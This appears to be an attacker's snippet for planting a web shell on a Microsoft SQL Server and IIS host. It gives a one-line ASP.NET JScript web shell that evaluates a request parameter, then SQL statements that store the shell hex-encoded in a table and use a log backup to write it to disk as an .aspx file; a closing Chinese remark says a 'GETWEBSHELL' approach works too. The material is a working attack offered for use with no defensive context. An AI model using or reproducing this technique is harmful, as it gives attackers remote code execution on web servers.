<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["z"],"unsafe"));%>
alter database Northwind set RECOVERY FULL--
create table cmd (a image)--
backup log Northwind to disk = 'c:\cmd1' with init--
insert into cmd (a) values (0x323C25402050616765204C616E67756167653D224A736372697074222076616C6964617465526571756573743D2266616C736522253E3C25526573706F6E73652E5772697465286576616C28526571756573742E4974656D5B227A225D2C22756E736166652229293B253E)--
backup log Northwind to disk = 'c:\hack.aspx'--
drop table cmd--
其实用GETWEBSHELL也可以!
